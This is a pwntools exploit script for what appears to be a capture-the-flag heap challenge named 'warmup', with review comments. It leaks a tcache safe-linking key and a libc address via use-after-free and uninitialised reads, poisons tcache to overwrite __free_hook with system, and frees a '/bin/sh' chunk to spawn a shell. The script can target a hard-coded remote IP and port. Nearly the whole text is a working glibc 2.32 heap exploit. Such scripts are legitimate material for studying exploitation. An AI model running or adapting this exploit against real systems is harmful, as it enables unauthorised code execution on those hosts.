# Python 2 style pwntools script: str and bytes are concatenated freely below
# (e.g. p64(...)+'\n', .ljust(8, '\x00')), which raises TypeError on Python 3.
from pwn import *
import sys

context.log_level='debug'   # echo every send/recv on the tube
context.arch='amd64'

binary = './warmup'
elf=ELF(binary)
# The libc build the fixed leak offset in leaklibc() was taken from; a different
# build needs both a different path here and a recomputed offset there.
libc = ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6')
flag=0   # 0 = run the local binary under a debugger-friendly process(); nonzero = remote instance
if flag:
    sh = remote('47.104.70.90', 25315)
else:
    sh = process(binary)
# Short I/O helpers over the pwntools tube `sh`.
sa = lambda s,n : sh.sendafter(s,n)          # wait for s, then send n as-is
sla = lambda s,n : sh.sendlineafter(s,n)     # wait for s, then send n plus newline
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)                   # read up to n bytes
ru = lambda s : sh.recvuntil(s)              # read through delimiter s (inclusive)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+":"+hex(addr))   # log "name:0x..."


def leaklibc():
    """Read a libc pointer off the tube and set the libc-relative globals.

    Reads until the first 0x7f byte, takes the 6 bytes ending there as a
    little-endian pointer and subtracts a fixed offset to get libc_base.
    The offset 0x1e4030 is not derived from libc.sym, so it is only valid
    for the libc build loaded above and must be recomputed for any other.

    Sets libc_base, __malloc_hook, __free_hook, system and realloc.
    binsh_addr, _IO_2_1_stdout_ and _IO_list_all are declared global here
    but never assigned in this function.
    """
    global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc
    libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1e4030
    success('libc_base = '+hex(libc_base))
    __malloc_hook=libc_base+libc.sym['__malloc_hook']
    __free_hook=libc_base+libc.sym['__free_hook']
    system=libc_base+libc.sym['system']
    realloc=libc_base+libc.sym['realloc']


# Menu wrappers for the target's prompts ('> ', 'idx: ', 'sz: ', 'data: ').
def cmd(index):
    """Select menu option `index` at the '> ' prompt."""
    sla('> ', str(index))


def add(index,sz,data):
    """Option 1: request slot `index` with size `sz`, then send `data` raw (no newline appended)."""
    cmd(1)
    sla('idx: ',str(index))
    sla('sz: ',str(sz))
    sa('data: ',data)


def edit(index,data):
    """Option 3: overwrite slot `index` with `data` raw (no newline appended)."""
    cmd(3)
    sla('idx: ',str(index))
    sa('data: ',data)


def show(index):
    """Option 2: ask the target to print slot `index`; the output is left on the tube."""
    cmd(2)
    sla('idx: ',str(index))


def dele(index):
    """Option 4: free slot `index`."""
    cmd(4)
    sla('idx: ',str(index))


def save(index):
    """Option 5 on slot `index`; what the target does for this option is not visible here."""
    cmd(5)
    sla('idx: ',str(index))
# --- Interaction sequence; every call drives the target's menu, so order matters. ---

# Stage 1: five allocations -- one 0x10, one 0x500, three 0x20.
add(0,0x10,'a')
add(1,0x500,'b')
add(2,0x20,'a')
add(3,0x20,'a')
add(4,0x20,'a')

# Stage 2: free the first two.
dele(0)
dele(1)

# Stage 3: re-request slot 0 with size 0 and empty data, display it, and read the
# 5 bytes after 'data: ' as `key` (zero-extended to 8 bytes).
# NOTE(review): this presumes a size-0 request leaves the freed chunk's stored
# metadata readable through show() -- confirm against the target binary.
add(0,0,'')
show(0)
ru('data: ')
key = u64(rc(5).ljust(8,'\x00'))
leak('key',key)

# Stage 4: same on slot 1 (the 0x500 chunk); leaklibc() consumes the printed
# pointer and derives libc_base and the hook addresses from it.
add(1,0,'')
show(1)
leaklibc()

# Stage 5: free 3, call option 5 on 4, then free 4.
dele(3)
save(4)
dele(4)

# Stage 6: edit slot 4 *after* it was freed (the script relies on the target not
# invalidating a freed slot). First qword is __free_hook xor key, second is
# (key<<12)+0x10; the xor against (address>>12) matches the pointer mangling of
# the glibc 2.32 build loaded above, so key is presumably the chunk address >> 12.
# The next two 0x20 requests reuse that freed chunk; the second one's data is
# written at __free_hook and stores the address of system.
edit(4,p64(__free_hook^key) + p64((key<<12) + 0x10) + '\n')
add(5,0x20,'/bin/sh\x00\n')
add(6,0x20,p64(system)+'\n')
# Freeing slot 5 passes its data to whatever __free_hook now points at.
dele(5)

ti()